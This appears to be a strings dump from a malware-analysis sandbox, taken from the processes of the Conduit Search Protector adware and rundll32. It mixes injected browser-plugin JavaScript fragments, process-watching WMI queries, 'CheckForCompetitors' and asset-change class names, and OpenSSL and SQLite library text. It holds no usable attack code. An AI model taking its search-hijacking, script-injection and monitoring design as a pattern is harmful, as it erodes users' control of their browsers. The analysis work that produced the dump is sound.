callback(ws.api.StatusEnum.SP_RESULT_SP_UNRESPONSIVE);
}, ws.api.RESULT_TIMOUET);
ws.internal.SendStringToVC(JSON.stringify(data), myCallback);
ws.api.storage.getKey =
function (pluginId, key, callback, options) {data.funcId = ws.api.FunctionsEnum.GET_KEY;
var value = resultObj.value;
if (resultObj.status != ws.api.StatusEnum.SP_RESULT_SUCCESS) {callback(resultObj.status, value);
callback(ws.api.StatusEnum.SP_RESULT_SP_UNRESPONSIVE, "");
ws.api.storage.removeKey =
data.funcId = ws.api.FunctionsEnum.REMOVE_KEY;
ws.api.system = ws.api.system || {};ws.api.system.remove =
data.funcId = ws.api.FunctionsEnum.REMOVE;
data.shouldCallUninstaller = shouldCallUninstaller;
ws.internal = ws.internal || {};if (ws.internal.injectedSP_PLUGIN_ID_SP_TASK_ID === undefined) {ws.internal.injectedSP_PLUGIN_ID_SP_TASK_ID = true;
mmscoree.dll
nkernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
8.0.0.0-11.999.999.999
33.0.0.0-36.999.999.999
16.0.0.0-31.999.999.999
{{{$663}}}{{{$664}}}{{{$665}}}{{{$666}}}2.16.10.61
UserRepository.dat
SystemRepository.dat
UIRepository.dat
_0.localstorage
chrome-extension_
{{{$251}}}{{{$252}}}{{{$254}}}{{{$255}}}36.0.0.0
32.0.0.0
{{{$291}}}{{{$290}}}{{{$294}}}{{{$293}}}{{{$297}}}{{{$296}}}kFailed to set Url
{{{$303}}}{{{$304}}}{{{$306}}}{{{$307}}}{{{$305}}}{{{$310}}}{{{$309}}}{{{$317}}}{{{$316}}}{{{$322}}}{{{$321}}}{{{$325}}}{{{$330}}}{{{$329}}}{{{$333}}}{{{$332}}}{{{$345}}}{{{$344}}}{{{$350}}}{{{$351}}}{{{$354}}}{{{$355}}}{{{$378}}}{{{$380}}}{{{$381}}}{{{$367}}}{{{$366}}}Yuser32.dll
ieframe.dll
Windows Server 2008
Windows Vista
Windows Server 2008 R2
Windows 7
Windows Server 2012
Windows 8
Windows 8.1
%x %x[%s] %I64x %x %x
HKEY_CLASSES_ROOT
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_PERFORMANCE_NLSTEXT
HKEY_PERFORMANCE_TEXT
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER_LOCAL_SETTINGS
ntdll.dll
{{{$698}}}{{{$697}}}{{{$868}}}{{{SP#Conduit::SearchProtector::SPM::SPMAssetsManager::MapAssets#SP}}}{{{$888}}}{{{SP#Conduit::SearchProtector::SPM::SPMAssetsManager::ExecuteAssetChangeAttemptDecision#SP}}}SPSetup.exe
{{{SP#Conduit::SearchProtector::SPM::Services::LoginManager::CheckForCompetitors#SP}}}{{{SP#Conduit::SearchProtector::SPM::Services::LoginManager::RequestService#SP}}}{{{SP#Conduit::SearchProtector::SPM::Services::LoginManager::RequestServiceByBrowser#SP}}}{{{SP#Conduit::SearchProtector::SPM::Services::LoginManager::HttpAsyncCallBack#SP}}}http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Plugin Id: %s, Plugin Name: %s, Plugin version: %s
chrome.exe
%s\script_%d.dat
888816666554443
6666554443
!6666554443
{{{$535}}}{{{$371}}}{{{$372}}}{{{$373}}}{{{$368}}}{{{$369}}}{{{$370}}}{{{$374}}}{{{$607}}}{{{$548}}}{{{$549}}}{{{$707}}}{{{SP#Conduit::SearchProtector::Utils::WMIAgentJob::Join#SP}}}{{{$715}}}SELECT * FROM __InstanceCreationEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
SELECT * FROM __InstanceDeletionEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
%s%s%s
Correct password required
IDispatch error #%d
{{{$625}}}[%s\%s.exe
01234567
{{{SP#Conduit::SearchProtector::Application::Services::ServiceManager::HttpAsyncCallBack#SP}}}UserSettings.dat
{{{SP#Conduit::SearchProtector::Application::Services::ServiceHandler::HttpAsyncCallBack#SP}}}e8.0.0.0-11.999.999.999
{{{$77}}}{{{SP#Conduit::SearchProtector::Application::Services::TimerBasedServiceHandler::HttpAsyncCallBack#SP}}}iRpcTransportException
C:\PROGRA~1\SearchProtect\SearchProtect\bin\cltmng.exe
cltmngui.exe_1296:
.text
`.rdata
@.data
.rsrc
@.reloc
DlSHA512 block transform for x86, CRYPTOGAMS by
Camellia for x86 by
AES for Intel AES-NI, CRYPTOGAMS by
AES for x86, CRYPTOGAMS by
RC4 for x86, CRYPTOGAMS by
Montgomery Multiplication for x86, CRYPTOGAMS by
SHA1 block transform for x86, CRYPTOGAMS by
SHA256 block transform for x86, CRYPTOGAMS by
GHASH for x86, CRYPTOGAMS by
GF(2^m) Multiplication for x86, CRYPTOGAMS by
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
kernel32.dll
left-curly-bracket
right-curly-bracket
boost thread: trying joining itself
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagVisual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
GetProcessWindowStation
operator
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
PUBLIC KEY
RSA part of OpenSSL 1.0.1e 11 Feb 2013
SHA-512 part of OpenSSL 1.0.1e 11 Feb 2013
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
?456789:;<=
!"#$%&'()* ,-./0123
Big Number part of OpenSSL 1.0.1e 11 Feb 2013
pubkey
PEM part of OpenSSL 1.0.1e 11 Feb 2013
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
NETSCAPE_CERT_SEQUENCE
certs
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
DSA part of OpenSSL 1.0.1e 11 Feb 2013
priv_key
pub_key
.\crypto\ec\ec_key.c
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
Any Extended Key Usage
anyExtendedKeyUsage
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
RAND part of OpenSSL 1.0.1e 11 Feb 2013
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
lhash part of OpenSSL 1.0.1e 11 Feb 2013
Stack part of OpenSSL 1.0.1e 11 Feb 2013
Diffie-Hellman part of OpenSSL 1.0.1e 11 Feb 2013
value.single
value.set
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
EVP part of OpenSSL 1.0.1e 11 Feb 2013
name.relativename
name.fullname
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
%*s%s:
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
ASN.1 part of OpenSSL 1.0.1e 11 Feb 2013
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
AUTHORITY_KEYID
keyid
cert_info
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
EC part of OpenSSL 1.0.1e 11 Feb 2013
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
.\crypto\dh\dh_key.c
%s: (%d bit)
Public-Key
Private-Key
recommended-private-length: %d bits
public-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
Public-Key: (%d bit)
Private-Key: (%d bit)
SHA1 part of OpenSSL 1.0.1e 11 Feb 2013
SHA-256 part of OpenSSL 1.0.1e 11 Feb 2013
RIPE-MD160 part of OpenSSL 1.0.1e 11 Feb 2013
SHA part of OpenSSL 1.0.1e 11 Feb 2013
MD5 part of OpenSSL 1.0.1e 11 Feb 2013
MD4 part of OpenSSL 1.0.1e 11 Feb 2013
AES part of OpenSSL 1.0.1e 11 Feb 2013
CAST part of OpenSSL 1.0.1e 11 Feb 2013
Blowfish part of OpenSSL 1.0.1e 11 Feb 2013
:RC2 part of OpenSSL 1.0.1e 11 Feb 2013
IDEA part of OpenSSL 1.0.1e 11 Feb 2013
libdes part of OpenSSL 1.0.1e 11 Feb 2013
DES part of OpenSSL 1.0.1e 11 Feb 2013
%d.%d.%d.%d
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
%d.%d.%d.%d/%d.%d.%d.%d
X509_CERT_PAIR
X509_CERT_AUX
X.509 part of OpenSSL 1.0.1e 11 Feb 2013
x%s
%s - d:d:d%.*s %d%s
keylen <= sizeof key
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
ECDSA part of OpenSSL 1.0.1e 11 Feb 2013
Basis Type: %s
Field Type: %s
ASN1 OID: %s
%s %s%lu (%s0x%lx)
'() ,-./:=?
%lu:%s:%s:%d:%s
Verifying - %s
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
.\crypto\x509v3\v3_akey.c
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
%*sCPS: %s
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
CONF part of OpenSSL 1.0.1e 11 Feb 2013
PROXY_CERT_INFO_EXTENSION
hexkey
rsa_keygen_pubexp
rsa_keygen_bits
keylength
keyfunc
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
.\crypto\pkcs12\p12_key.c
d.receiptList
d.allOrFirstTier
d.compressedData
d.authenticatedData
d.encryptedData
d.digestedData
d.envelopedData
d.signedData
d.ori
d.pwri
d.kekri
d.kari
d.ktri
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyIdentifier
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
keyAttr
keyAttrId
CMS_KeyTransRecipientInfo
encryptedKey
keyEncryptionAlgorithm
certificates
d.crl
d.subjectKeyIdentifier
d.issuerAndSerialNumber
CMS_CertificateChoices
d.v2AttrCert
d.v1AttrCert
d.extendedCertificate
d.certificate
CMS_OtherCertificateFormat
otherCert
otherCertFormat
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
CONF_def part of OpenSSL 1.0.1e 11 Feb 2013
[[%s]]
[%s] %s=%s
ECDH part of OpenSSL 1.0.1e 11 Feb 2013
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
%s.dll
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
{{{$1274}}}{{{$626}}}{{{$1275}}}C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\Boost\boost_1_55_0\boost/exception/detail/exception_ptr.hpp
{{{$461}}}{{{$468}}}{{{$471}}}{{{$473}}}\StringFileInfo\xx\%s
(more frames truncated from call stack report)
%d/%d/%d d:d:d
Module %d
Image Base: 0xx Image Size: 0xx
Checksum: 0xx Time Stamp: 0xx
File Size: %-10d File Time: %s
Company: %s
Product: %s
FileDesc: %s
FileVer: %d.%d.%d.%d
ProdVer: %d.%d.%d.%d
Windows Vista
Windows 7
Windows Server 2008
Windows 8
Windows Server 2008 R2
Windows 9
Web Edition
Windows Server 2012
Windows XP
Windows Server 9
Windows 2000
(build %d)
This sample does not support this version of Windows.
Error occurred at %s.
Operating system: %s
Operating system: Could not Determine
%d processor(s), type %d.
%d%% memory in use.
%d MBytes paging file.
%d MBytes physical memory free.
%d MBytes user address space free.
%d MBytes paging file free.
%d MBytes user address space.
Web Server Edition
Windows Server 2003 R2
Windows Storage Server 2003
Windows Home Server
a Float Denormal Operand
Windows XP Professional x64 Edition
Windows Server 2003
a Float Invalid Operation
0xx:
%s\CRASH_REPORT_%s.txt
%d MBytes physical memory.
EDI: 0xx ESI: 0xx EAX: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EFlags: 0xx ESP: 0xx SegSs: 0xx
%s caused %s (0xx)
in module %s at x:x.
%s location x caused an access violation.
===== [end of %s] =====
%s\CRASH_DUMP_%s.dmp
Error creating dump file, err=%d
Exception code is 0xX
Crash dump file: %s
Crash report file :%s
P%d_T%d_Dld_ld_ld_Tld_ld_ld
code: %x, addr: %x, module: %s
code: %x
{{{$629}}}{{{$631}}}{{{$630}}}{{{$632}}}C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\3rdParty\google\gtest\gtest-1.6.0\include\gtest/internal/gtest-port.h
%s 0x%I64x %s [file:%s(%u)]
CREATE TABLE ItemTable (key TEXT UNIQUE ON CONFLICT REPLACE, value TEXT NOT NULL ON CONFLICT FAIL);
insert into ItemTable (key, value) VALUES ('%s', '%s');
{{{$359}}}{{{$358}}}{{{$357}}}{{{$360}}}00:00:00.
NtQueryKey
{{{$618}}}{{{$617}}}{{{$616}}}{{{$615}}}{{{$624}}}{{{$623}}}{{{$692}}}{{{$691}}}{{{$690}}}{{{$693}}}1.1.3
gen_codes: max_code %d
code %d bits %d->%d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
wininet.dll
ftp://
https://
http://
[%u, 0xx] %s
https
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
request HttpSendRequestA failed...
Content-Length: %u
response failed...last error %d
{{{$718}}}{{{$717}}}{{{$719}}}{{{$720}}}{{{$722}}}{{{$721}}}{{{$724}}}{{{$723}}}{{{$725}}}{{{$729}}}{{{$728}}}{{{$727}}}{{{$726}}}{{{$730}}}{{{$733}}}{{{$732}}}{{{$731}}}{{{$735}}}{{{$734}}}{{{$744}}}{{{$743}}}{{{$742}}}{{{$747}}}{{{$746}}}{{{$667}}}{{{$669}}}{{{$668}}}SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
0123456789ABCDEF3.7.16
CREATE TEMP TABLE sqlite_temp_master(
{{{$705}}}{{{$704}}}{{{$703}}}Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
SQLITE_
d-d-d
d:d:d
d-d-d d:d:d
failed memory resize %u to %u bytes
failed to allocate %u bytes of memory
API call with %s database connection pointer
922337203685477580
RowKey
OsError 0x%x (%u)
GetProcessHeap
delayed %dms for lock/sharing conflict
os_win.c:%d: (%d) %s(%s) - %s
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
2nd reference to page %d
invalid page number %d
Page %d:
freelist leaf count too big on page %d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
On tree page %d cell %d:
btreeInitPage() returns error code %d
unable to get the page. error code=%d
On page %d at right child:
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
Page %d is never used
Fragmentation of %d bytes reported as %d on page %d
unknown database %s
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
keyinfo(%d
%s(%d)
MJ delete: %s
%s-mjXXXXXX9XXz
foreign key constraint failed
-mjX9X
MJ collide: %s
bind on a busy prepared statement: [%s]
unable to use function %s in the requested context
zeroblob(%d)
constraint failed at %d in [%s]
abort at %d in [%s]: %s
cannot commit transaction - SQL statements in progress
cannot release savepoint - SQL statements in progress
no such savepoint: %s
cannot open savepoint - SQL statements in progress
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
sqlite_master
sqlite_temp_master
database table is locked: %s
cannot change %s wal mode from within a transaction
statement aborts at %d: [%s] %s
cannot open view: %s
cannot open virtual table: %s
cannot open value of type %s
cannot open %s column for writing
indexed
foreign key
no such column: "%s"
misuse of aliased aggregate %s
%s: %s
%s: %s.%s
%s: %s.%s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
variable number must be between ?1 and ?%d
Expression tree is too large (maximum depth %d)
too many columns in %s
too many SQL variables
misuse of aggregate: %s()
EXECUTE %s%s SUBQUERY %d
sqlite_rename_trigger
sqlite_rename_table
%s%.*s"%w"
%.*s"%w"%s
type='trigger' AND (%s)
%s OR name=%Q
sqlite_rename_parent
there is already another table or index with this name: %s
table %s may not be altered
sqlite_
sqlite_sequence
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
Cannot add a PRIMARY KEY column
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat1
sqlite_altertab_%s
DELETE FROM %Q.%s WHERE %s=%Q
CREATE TABLE %Q.%s(%s)
too many attached databases - max %d
invalid name: "%s"
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
unable to open database: %s
database %s is already in use
database %s is locked
cannot detach database %s
no such database: %s
%s %T cannot reference objects in database %s
sqlite_attach
sqlite_detach
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
object name reserved for internal use: %s
too many columns on %s
there is already an index named %s
table "%s" has more than one primary key
default value of column [%s] is not constant
duplicate column name: %s
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
sqlite_stat%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
view %s is circularly defined
use DROP TABLE to delete table %s
table %s may not be dropped
sqlite_stat
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
foreign key on %s should reference only one column of table %T
use DROP VIEW to delete view %s
table %s may not be indexed
indexed columns are not unique
index %s already exists
there is already a table named %s
virtual tables may not be indexed
views may not be indexed
table %s has no column named %s
sqlite_autoindex_%s_%d
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);CREATE%s INDEX %.*s
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
a JOIN clause is required before %s
unable to identify the object to be reindexed
cannot modify %s because it is a view
table %s may not be modified
no such collation sequence: %s
sqlite_version
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_log
sqlite_source_id
%d values for %d columns
table %S has %d columns but %d values were supplied
foreign key mismatch - "%w" referencing "%w"
constraint %s failed
%s.%s may not be NULL
table %S has no column named %s
PRIMARY KEY must be unique
unable to open shared library [%s]
sqlite3_extension_init
automatic extension loading failed: %s
error during initialization: %s
no entry point [%s] in shared library [%s]
foreign_keys
foreign_key_list
foreign_key_check
*** in database %s ***
unsupported encoding: %s
unsupported file format
%s - %s
malformed database schema (%s)
database schema is locked: %s
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
RIGHT and FULL OUTER JOINs are not currently supported
unknown or unsupported join type: %T %T%s%T
cannot join using column %s - column not present in both tables
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
%s.%s
COMPOUND SUBQUERIES %d AND %d %s(%s)
USE TEMP B-TREE FOR %s
LIMIT clause should come after %s not before
ORDER BY clause should come after %s not before
%s:%d
too many references to "%s": max 65535
sqlite_subquery_%p_
no such index: %s
SELECTs to the left and right of %s do not have the same number of result columns
no such table: %s
%s.%s.%s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
no such trigger: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
cannot create INSTEAD OF trigger on table: %S
no such column: %s
-- TRIGGER %s
cannot VACUUM - SQL statements in progress
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
PRAGMA vacuum_db.synchronous=OFF
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
vtable constructor did not declare schema: %s
vtable constructor failed: %s
table %s: xBestIndex returned an invalid plan
no such module: %s
%s TABLE %s
%s SUBQUERY %d
%s USING %s%sINDEX%s%s%s
%s AS %s
%s (rowid>?)
%s (rowid>? AND rowid)
%s (rowid=?)
%s USING INTEGER PRIMARY KEY
at most %d tables in a join
%s (~%lld rows)
%s VIRTUAL TABLE INDEX %d:%s
%s (rowid)
cannot use index: %s
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such vfs: %s
%s mode not allowed: %s
no such %s mode: %s
cannot open file at line %d of [%.10s]
misuse at line %d of [%.10s]
database corruption at line %d of [%.10s]
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\SearchProtector\Dev\2.16.10\Output\Release_32\cltmngui.pdb
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
VERSION.dll
dbghelp.dll
GetCPInfo
GDI32.dll
SHELL32.dll
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoA
WININET.dll
RegisterHotKey
ReportEventA
I_RpcBindingInqTransportType
RPCRT4.dll
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\UI
Zmscoree.dll
Zkernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
8.0.0.0-11.999.999.999
33.0.0.0-36.999.999.999
16.0.0.0-31.999.999.999
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
UserRepository.dat
SystemRepository.dat
UIRepository.dat
%x %x[%s] %I64x %x %x
Yuser32.dll
ieframe.dll
Windows Server 2008
Windows Vista
Windows Server 2008 R2
Windows 7
Windows Server 2012
Windows 8
Windows 8.1
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_USER_LOCAL_SETTINGS
2.16.10.61
_0.localstorage
chrome-extension_
36.0.0.0
32.0.0.0
Failed to set Url
SELECT * FROM __InstanceDeletionEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
SELECT * FROM __InstanceCreationEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
ntdll.dll
%s%s%s
Correct password required
Conduit::SearchProtector::Utils::WMIAgentJob::Join
888816666554443
6666554443
!6666554443
01234567
UserSettings.dat
Conduit::SearchProtector::Application::Services::ServiceManager::HttpAsyncCallBack
Conduit::SearchProtector::Application::Services::TimerBasedServiceHandler::HttpAsyncCallBack
Conduit::SearchProtector::Application::Services::ServiceHandler::HttpAsyncCallBack
RpcTransportException
C:\PROGRA~1\SearchProtect\UI\bin\cltmngui.exe
rundll32.exe_3116:
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
There is not enough memory to run the file %s.
Please close other windows and try again.
The file %s or one of its components could not be opened.
The file %s or one of its components cannot run.
The file %s or one of its components requires a different version of Windows.
